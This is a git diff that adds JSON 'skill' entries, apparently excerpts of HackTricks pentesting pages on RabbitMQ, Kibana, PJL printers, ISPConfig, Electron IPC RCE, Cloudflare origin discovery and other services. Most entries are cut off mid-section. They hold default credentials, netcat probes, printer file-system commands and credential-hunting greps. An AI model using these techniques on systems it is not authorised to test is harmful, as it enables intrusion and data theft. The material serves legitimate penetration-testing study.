+ "# 15672 - Pentesting RabbitMQ Management",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "You can learn more about RabbitMQ in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\\",
+ "In this port you may find the RabbitMQ Management web console if the [management plugin](https://www.rabbitmq.com/management.html) is enabled.\\",
+ "The main page should looks like this:",
+ ".png>)",
+ "## Enumeration",
+ "The default credentials are \"_**guest**_\":\"_**guest**_\". If they aren't working you may try to [**brute-force the login**](../generic-hacking/brute-force.md#http-post-form).",
+ "To manually start this module you need to execute:",
+ "rabbitmq-plugins enable rabbitmq_management",
+ "service rabbitmq-server restart",
+ "Once you have correctly authenticated you will see the admin console:",
+ ".png>)",
+ "Also, if you have valid credentials you may find interesting the information of `http://localhost:15672/api/connections`"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_7115676fa687.json b/skills/network_services_pentesting_7115676fa687.json
new file mode 100644
index 0000000..5c5596c
--- /dev/null
+++ b/skills/network_services_pentesting_7115676fa687.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_7115676fa687",
+ "category": "network-services-pentesting",
+ "title": "5601 pentesting kibana",
+ "description": "# 5601/tcp - Pentesting Kibana\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nKibana is known for its ability to search and visualize data within Elasticsearch, typically running on port **5601**. It serves as the interface for the Elastic Stack cluster's monitoring, management, and security functions.\n\n### Understanding Authentication\n\nThe process of authentication in Kibana is inherently linked to the **credentials used in Elasticsearch**. If Elasticsearch has authentic",
+ "payloads": [
+ "# 5601/tcp - Pentesting Kibana",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "Kibana is known for its ability to search and visualize data within Elasticsearch, typically running on port **5601**. It serves as the interface for the Elastic Stack cluster's monitoring, management, and security functions.",
+ "### Understanding Authentication",
+ "The process of authentication in Kibana is inherently linked to the **credentials used in Elasticsearch**. If Elasticsearch has authentication disabled, Kibana can be accessed without any credentials. Conversely, if Elasticsearch is secured with credentials, the same credentials are required to access Kibana, maintaining identical user permissions across both platforms. Credentials might be found in the **/etc/kibana/kibana.yml** file. If these credentials do not pertain to the **kibana_system** user, they may offer broader access rights, as the kibana_system user's access is restricted to monitoring APIs and the .kibana index.",
+ "### Actions Upon Access",
+ "Once access to Kibana is secured, several actions are advisable:",
+ "- Exploring data from Elasticsearch should be a priority.",
+ "- The ability to manage users, including the editing, deletion, or creation of new users, roles, or API keys, is found under Stack Management -> Users/Roles/API Keys.",
+ "- It's important to check the installed version of Kibana for known vulnerabilities, such as the RCE vulnerability identified in versions prior to 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/index.html#ref2)).",
+ "### SSL/TLS Considerations",
+ "In instances where SSL/TLS is not enabled, the potential for leaking sensitive information should be thoroughly evaluated.s",
+ "## References",
+ "- [https://insinuator.net/2021/01/pentesting-the-elk-stack/](https://insinuator.net/2021/01/pentesting-the-elk-stack/)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/5601-pentesting-kibana.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_756e2b3f2da7.json b/skills/network_services_pentesting_756e2b3f2da7.json
new file mode 100644
index 0000000..f7cdf6d
--- /dev/null
+++ b/skills/network_services_pentesting_756e2b3f2da7.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_756e2b3f2da7",
+ "category": "network-services-pentesting",
+ "title": "uncovering cloudflare",
+ "description": "# Uncovering CloudFlare\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Common Techniques to Uncover Cloudflare\n\n- You can use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.\n - Same could be achieve **checking historical SSL certificates** that could be pointing to the origin IP address.\n - Check also **DNS records of other subdomains pointing directly to IPs**, as it's possible that other subdomains ",
+ "payloads": [
+ "# Uncovering CloudFlare",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Common Techniques to Uncover Cloudflare",
+ "- You can use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.",
+ "- Same could be achieve **checking historical SSL certificates** that could be pointing to the origin IP address.",
+ "- Check also **DNS records of other subdomains pointing directly to IPs**, as it's possible that other subdomains are pointing to the same server (maybe to offer FTP, mail or any other service).",
+ "- If you find a **SSRF inside the web application** you can abuse it to obtain the IP address of the server.",
+ "- Search a unique string of the web page in browsers such as shodan (and maybe google and similar?). Maybe you can find an IP address with that content.",
+ "- In a similar way instead of looking for a uniq string you could search for the favicon icon with the tool: [https://github.com/karma9874/CloudFlare-IP](https://github.com/karma9874/CloudFlare-IP) or with [https://github.com/pielco11/fav-up](https://github.com/pielco11/fav-up)",
+ "- This won't work be very frequently because the server must send the same response when it's accessed by the IP address, but you never know.",
+ "## Tools to uncover Cloudflare",
+ "- Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) or [https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com). Or use the tool [CloudPeler](https://github.com/zidansec/CloudPeler) (which uses that API)",
+ "- Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)",
+ "- [**CF-Hero**](https://github.com/musana/CF-Hero) is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.",
+ "- [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_75bab38f2dbb.json b/skills/network_services_pentesting_75bab38f2dbb.json
new file mode 100644
index 0000000..cd6b87d
--- /dev/null
+++ b/skills/network_services_pentesting_75bab38f2dbb.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_75bab38f2dbb",
+ "category": "network-services-pentesting",
+ "title": "9100 pjl",
+ "description": "# 9100/tcp - PJL (Printer Job Language)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFrom [here](http://hacking-printers.net/wiki/index.php/Port_9100_printing): Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as \u2018_the simplest, fastest, and generally the most reliable network prot",
+ "payloads": [
+ "# 9100/tcp - PJL (Printer Job Language)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "From [here](http://hacking-printers.net/wiki/index.php/Port_9100_printing): Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as \u2018_the simplest, fastest, and generally the most reliable network protocol used for printers_\u2019. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing \u2013 which is supported by almost any network printer \u2013 is used as the channel for security analysis with PRET and PFT.",
+ "If you want to learn more about [**hacking printers read this page**](http://hacking-printers.net/wiki/index.php/Main_Page).",
+ "**Default port:** 9100",
+ "9100/tcp open jetdirect",
+ "## Enumeration",
+ "### Manual",
+ "```bash",
+ "nc -vn 9100",
+ "@PJL INFO STATUS #CODE=40000 DISPLAY=\"Sleep\" ONLINE=TRUE",
+ "@PJL INFO ID # ID (Brand an version): Brother HL-L2360D series:84U-F75:Ver.b.26",
+ "@PJL INFO PRODINFO #Product info",
+ "@PJL FSDIRLIST NAME=\"0:\\\" ENTRY=1 COUNT=65535 #List dir"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/9100-pjl.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_769c0ff70917.json b/skills/network_services_pentesting_769c0ff70917.json
new file mode 100644
index 0000000..26d4011
--- /dev/null
+++ b/skills/network_services_pentesting_769c0ff70917.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_769c0ff70917",
+ "category": "network-services-pentesting",
+ "title": "512 pentesting rexec",
+ "description": "# 512 - Pentesting Rexec\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nRexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, \u2026). It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**. The protocol was defined in the early 1980\u2019s (see RFC 1060) and is nowadays considered **insecure by design**. Nevertheless it is still enabled by default in some legacy UN",
+ "payloads": [
+ "# 512 - Pentesting Rexec",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, \u2026). It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**. The protocol was defined in the early 1980\u2019s (see RFC 1060) and is nowadays considered **insecure by design**. Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.",
+ "**Default Port:** TCP 512 (`exec`)",
+ "PORT STATE SERVICE",
+ "512/tcp open exec",
+ "> \ud83d\udd25 All traffic \u2013 including credentials \u2013 is transmitted **unencrypted**. Anyone with the ability to sniff the network can recover the username, password and command.",
+ "### Protocol quick-look",
+ "1. Client connects to TCP 512.",
+ "2. Client sends three **NUL-terminated** strings:",
+ "* the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`),",
+ "* the **username**,",
+ "* the **password**.",
+ "3. A final NUL-terminated string with the **command** to execute is sent."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/512-pentesting-rexec.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_772a01dfd93b.json b/skills/network_services_pentesting_772a01dfd93b.json
new file mode 100644
index 0000000..1912302
--- /dev/null
+++ b/skills/network_services_pentesting_772a01dfd93b.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_772a01dfd93b",
+ "category": "network-services-pentesting",
+ "title": "ispconfig",
+ "description": "# ISPConfig\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Overview\n\nISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.\n\nKey default paths:\n- Web root often at `/var/www/ispconfig` when served with `php -S` ",
+ "payloads": [
+ "# ISPConfig",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Overview",
+ "ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.",
+ "Key default paths:",
+ "- Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx.",
+ "- Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).",
+ "Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it:",
+ "```bash",
+ "ssh -L 9001:127.0.0.1:8080 user@target",
+ "# then browse http://127.0.0.1:9001",
+ "## Language editor PHP code injection (CVE-2023-46818)",
+ "- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)",
+ "- Preconditions:",
+ "- Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/ispconfig.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_779af06681d4.json b/skills/network_services_pentesting_779af06681d4.json
new file mode 100644
index 0000000..116ddf6
--- /dev/null
+++ b/skills/network_services_pentesting_779af06681d4.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_779af06681d4",
+ "category": "network-services-pentesting",
+ "title": "1414 pentesting ibmmq",
+ "description": "# 1414 - Pentesting IBM MQ\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic information\n\nIBM MQ is an IBM technology to manage message queues. As other **message broker** technologies, it is dedicated to receive, store, process and classify information between producers and consumers.\n\nBy default, **it exposes IBM MQ TCP port 1414**.\nSometimes, HTTP REST API can be exposed on port **9443**.\nMetrics (Prometheus) could also be accessed from TCP port **9157**.\n\nThe IBM MQ TCP port 1414 can",
+ "payloads": [
+ "# 1414 - Pentesting IBM MQ",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic information",
+ "IBM MQ is an IBM technology to manage message queues. As other **message broker** technologies, it is dedicated to receive, store, process and classify information between producers and consumers.",
+ "By default, **it exposes IBM MQ TCP port 1414**.",
+ "Sometimes, HTTP REST API can be exposed on port **9443**.",
+ "Metrics (Prometheus) could also be accessed from TCP port **9157**.",
+ "The IBM MQ TCP port 1414 can be used to manipulate messages, queues, channels, ... but **also to control the instance**.",
+ "IBM provides a large technical documentation available on [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq).",
+ "## Tools",
+ "A suggested tool for easy exploitation is **[punch-q](https://github.com/sensepost/punch-q)**, with Docker usage. The tool is actively using the Python library `pymqi`.",
+ "For a more manual approach, use the Python library **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ dependencies](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) are needed.",
+ "### Installing pymqi",
+ "**IBM MQ dependencies** needs to be installed and loaded:",
+ "1. Create an account (IBMid) on [https://login.ibm.com/](https://login.ibm.com/)."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/1414-pentesting-ibmmq.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_807b95992089.json b/skills/network_services_pentesting_807b95992089.json
new file mode 100644
index 0000000..dad3761
--- /dev/null
+++ b/skills/network_services_pentesting_807b95992089.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_807b95992089",
+ "category": "network-services-pentesting",
+ "title": "php ssrf",
+ "description": "# PHP SSRF\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n### SSRF PHP functions\n\nSome function such as **file_get_contents(), fopen(), file(), md5_file()** accept URLs as input that they will follow making **possible SSRF vulnerabilities** if the use can control the data:\n\n```php\nfile_get_contents(\"http://127.0.0.1:8081\");\nfopen(\"http://127.0.0.1:8081\", \"r\");\nfile(\"http://127.0.0.1:8081\");\nmd5_file(\"http://127.0.0.1:8081\");\n```\n\n### Wordpress SSRF via DNS Rebinding\n\nAs [**explained in t",
+ "payloads": [
+ "# PHP SSRF",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "### SSRF PHP functions",
+ "Some function such as **file_get_contents(), fopen(), file(), md5_file()** accept URLs as input that they will follow making **possible SSRF vulnerabilities** if the use can control the data:",
+ "```php",
+ "file_get_contents(\"http://127.0.0.1:8081\");",
+ "fopen(\"http://127.0.0.1:8081\", \"r\");",
+ "file(\"http://127.0.0.1:8081\");",
+ "md5_file(\"http://127.0.0.1:8081\");",
+ "### Wordpress SSRF via DNS Rebinding",
+ "As [**explained in this blog post**](https://patchstack.com/articles/exploring-the-unpatched-wordpress-ssrf), even the Wordpress function **`wp_safe_remote_get`** is vulnerable to DNS rebinding, making it potentially vulnerable to SSRF attacks. The main validation it calls is **wp_http_validate_ur**l, which checks that the protocol is `http://` or `https://` and that the port is one of **80**, **443**, and **8080**, but it's **vulnerable to DNS rebinding**.",
+ "Other vulnerable functions according to the post are:",
+ "- `wp_safe_remote_request()`",
+ "- `wp_safe_remote_post()`",
+ "- `wp_safe_remote_head()`"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_8264228b30c9.json b/skills/network_services_pentesting_8264228b30c9.json
new file mode 100644
index 0000000..4f0d66e
--- /dev/null
+++ b/skills/network_services_pentesting_8264228b30c9.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_8264228b30c9",
+ "category": "network-services-pentesting",
+ "title": "8009 pentesting apache jserv protocol ajp",
+ "description": "# 8009 - Pentesting Apache JServ Protocol (AJP)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFrom [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/)\n\n> AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org/) to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static co",
+ "payloads": [
+ "# 8009 - Pentesting Apache JServ Protocol (AJP)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "From [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/)",
+ "> AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org/) to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content.",
+ "Also interesting:",
+ "> The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles",
+ "**Default port:** 8009",
+ "PORT STATE SERVICE",
+ "8009/tcp open ajp13",
+ "## CVE-2020-1938 ['Ghostcat'](https://www.chaitin.cn/en/ghostcat)",
+ "This is an LFI vuln which allows to get some files like `WEB-INF/web.xml` which contains credentials. This is an [exploit](https://www.exploit-db.com/exploits/48143) to abuse the vulnerability and AJP exposed ports might be vulnerable to it.",
+ "The patched versions are at or above 9.0.31, 8.5.51, and 7.0.100.",
+ "## Enumeration",
+ "### Automatic"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_82b3931dd3ed.json b/skills/network_services_pentesting_82b3931dd3ed.json
new file mode 100644
index 0000000..3c5b6cf
--- /dev/null
+++ b/skills/network_services_pentesting_82b3931dd3ed.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_82b3931dd3ed",
+ "category": "network-services-pentesting",
+ "title": "9001 pentesting hsqldb",
+ "description": "# 9001 - Pentesting HSQLDB\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**HSQLDB \\([HyperSQL DataBase](http://hsqldb.org/)\\)** is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes.\n\n**Default port:** 9001\n\n```text\n9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)\n```\n\n## Default Settings\n",
+ "payloads": [
+ "# 9001 - Pentesting HSQLDB",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**HSQLDB \\([HyperSQL DataBase](http://hsqldb.org/)\\)** is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes.",
+ "**Default port:** 9001",
+ "```text",
+ "9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)",
+ "## Default Settings",
+ "Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges.",
+ "Default credentials are usually `sa` with a blank password.",
+ "If you\u2019ve exploited another service, search for possible credentials using",
+ "```text",
+ "grep -rP 'jdbc:hsqldb.*password.*' /path/to/search",
+ "Note the database name carefully - you\u2019ll need it to connect.",
+ "## Info Gathering"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/9001-pentesting-hsqldb.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_82e13fb89d74.json b/skills/network_services_pentesting_82e13fb89d74.json
new file mode 100644
index 0000000..6183b89
--- /dev/null
+++ b/skills/network_services_pentesting_82e13fb89d74.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_82e13fb89d74",
+ "category": "network-services-pentesting",
+ "title": "4222 pentesting nats",
+ "description": "# 4222 - Pentesting NATS / JetStream\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**NATS** is a high-performance message bus that speaks a simple text-based protocol: the server transmits an `INFO { ... }` JSON banner immediately after TCP connect, and the client replies with a `CONNECT {\"user\":\"USERNAME\",\"pass\":\"PASSWORD\",...}` frame followed by optional `PING`/`PUB`/`SUB` commands. JetStream adds persistence primitives (Streams & Consumers) on top of the same TCP port",
+ "payloads": [
+ "# 4222 - Pentesting NATS / JetStream",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**NATS** is a high-performance message bus that speaks a simple text-based protocol: the server transmits an `INFO { ... }` JSON banner immediately after TCP connect, and the client replies with a `CONNECT {\"user\":\"USERNAME\",\"pass\":\"PASSWORD\",...}` frame followed by optional `PING`/`PUB`/`SUB` commands. JetStream adds persistence primitives (Streams & Consumers) on top of the same TCP port (`4222/tcp`). TLS and authentication are optional, so many internal deployments run **plaintext AUTH**.",
+ "* Default port: **4222/tcp** (4223+ for clustered routes)",
+ "* Stock banner fields: `\"version\"`, `\"auth_required\"`, `\"jetstream\"`, `\"max_payload\"`, `\"tls_required\"`",
+ "## Enumeration",
+ "### Banner grabbing / service probes",
+ "```bash",
+ "nmap -p4222 -sV --script banner TARGET",
+ "# Sample output",
+ "# 4222/tcp open nats NATS.io gnatsd 2.11.3",
+ "# | banner: INFO {\"server_id\":\"NDo...\",\"version\":\"2.11.3\",\"proto\":1,\"auth_required\":true,\"jetstream\":true,\"max_payload\":1048576}",
+ "The INFO frame can also be pulled manually:",
+ "```bash"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/4222-pentesting-nats.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_848f3376039b.json b/skills/network_services_pentesting_848f3376039b.json
new file mode 100644
index 0000000..c25c7fc
--- /dev/null
+++ b/skills/network_services_pentesting_848f3376039b.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_848f3376039b",
+ "category": "network-services-pentesting",
+ "title": "4369 pentesting erlang port mapper daemon epmd",
+ "description": "# 4369 Pentesting Erlang Port Mapper Daemon (epmd)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Info\n\nThe **Erlang Port Mapper Daemon (epmd)** serves as a coordinator for distributed Erlang instances. It is responsible for mapping symbolic node names to machine addresses, essentially ensuring that each node name is associated with a specific address. This role of **epmd** is crucial for the seamless interaction and communication between different Erlang nodes across a network.\n\n**De",
+ "payloads": [
+ "# 4369 Pentesting Erlang Port Mapper Daemon (epmd)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Info",
+ "The **Erlang Port Mapper Daemon (epmd)** serves as a coordinator for distributed Erlang instances. It is responsible for mapping symbolic node names to machine addresses, essentially ensuring that each node name is associated with a specific address. This role of **epmd** is crucial for the seamless interaction and communication between different Erlang nodes across a network.",
+ "**Default port**: 4369",
+ "PORT STATE SERVICE VERSION",
+ "4369/tcp open epmd Erlang Port Mapper Daemon",
+ "This is used by default on RabbitMQ and CouchDB installations.",
+ "## Enumeration",
+ "### Manual",
+ "```bash",
+ "echo -n -e \"\\x00\\x01\\x6e\" | nc -vn 4369",
+ "#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html",
+ "dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb",
+ "apt-get install erlang"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_873feec2cedf.json b/skills/network_services_pentesting_873feec2cedf.json
new file mode 100644
index 0000000..9f017a9
--- /dev/null
+++ b/skills/network_services_pentesting_873feec2cedf.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_873feec2cedf",
+ "category": "network-services-pentesting",
+ "title": "electron contextisolation rce via ipc",
+ "description": "# Electron contextIsolation RCE via IPC\n\n{{#include ../../../banners/hacktricks-training.md}}\n\nIf the preload script exposes an IPC endpoint from the main.js file, the renderer process will be able to access it and if vulnerable, a RCE might be possible.\n\n**Most of these examples were taken from here** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo). Check the video for further information.\n\n## Example 0\n\nExample from [https://speakerdeck.com/masato",
+ "payloads": [
+ "# Electron contextIsolation RCE via IPC",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "If the preload script exposes an IPC endpoint from the main.js file, the renderer process will be able to access it and if vulnerable, a RCE might be possible.",
+ "**Most of these examples were taken from here** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo). Check the video for further information.",
+ "## Example 0",
+ "Example from [https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21](https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21) (you have the full example of how MS Teams was abusing from XSS to RCE in those slides, this is just a very basic example):",
+ "",
+ "## Example 1",
+ "Check how the `main.js` listens on `getUpdate` and will **download and execute any URL** passed.\\",
+ "Check also how `preload.js` **exposes any IPC** event from main.",
+ "```javascript",
+ "// Part of code of main.js",
+ "ipcMain.on(\"getUpdate\", (event, url) => {",
+ "console.log(\"getUpdate: \" + url)",
+ "mainWindow.webContents.downloadURL(url)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_8972fafe316f.json b/skills/network_services_pentesting_8972fafe316f.json
new file mode 100644
index 0000000..9f7d3ef
--- /dev/null
+++ b/skills/network_services_pentesting_8972fafe316f.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_8972fafe316f",
+ "category": "network-services-pentesting",
+ "title": "5353 udp multicast dns mdns",
+ "description": "# 5353/UDP Multicast DNS (mDNS) and DNS-SD\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nMulticast DNS (mDNS) enables DNS-like name resolution and service discovery inside a local link without a unicast DNS server. It uses UDP/5353 and the multicast addresses 224.0.0.251 (IPv4) and FF02::FB (IPv6). DNS Service Discovery (DNS-SD, typically used with mDNS) provides a standardized way to enumerate and describe services via PTR, SRV and TXT records.\n\n```\nPORT STATE SERVI",
+ "payloads": [
+ "# 5353/UDP Multicast DNS (mDNS) and DNS-SD",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "Multicast DNS (mDNS) enables DNS-like name resolution and service discovery inside a local link without a unicast DNS server. It uses UDP/5353 and the multicast addresses 224.0.0.251 (IPv4) and FF02::FB (IPv6). DNS Service Discovery (DNS-SD, typically used with mDNS) provides a standardized way to enumerate and describe services via PTR, SRV and TXT records.",
+ "PORT STATE SERVICE",
+ "5353/udp open zeroconf",
+ "Key protocol details you\u2019ll often leverage during attacks:",
+ "- Names in the .local zone are resolved via mDNS.",
+ "- QU (Query Unicast) bit may request unicast replies even for multicast questions.",
+ "- Implementations should ignore packets not sourced from the local link; some stacks still accept them.",
+ "- Probing/announcing enforces unique host/service names; interfering here creates DoS/\u201cname squatting\u201d conditions.",
+ "## DNS-SD service model",
+ "Services are identified as _._tcp or _._udp under .local, e.g. _ipp._tcp.local (printers), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge), etc. Discover types with _services._dns-sd._udp.local, then resolve discovered instances to SRV/TXT/A/AAAA.",
+ "## Network Exploration and Enumeration",
+ "- nmap target scan (direct mDNS on a host):"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_89c7d4c8843a.json b/skills/network_services_pentesting_89c7d4c8843a.json
new file mode 100644
index 0000000..5ff6077
--- /dev/null
+++ b/skills/network_services_pentesting_89c7d4c8843a.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_89c7d4c8843a",
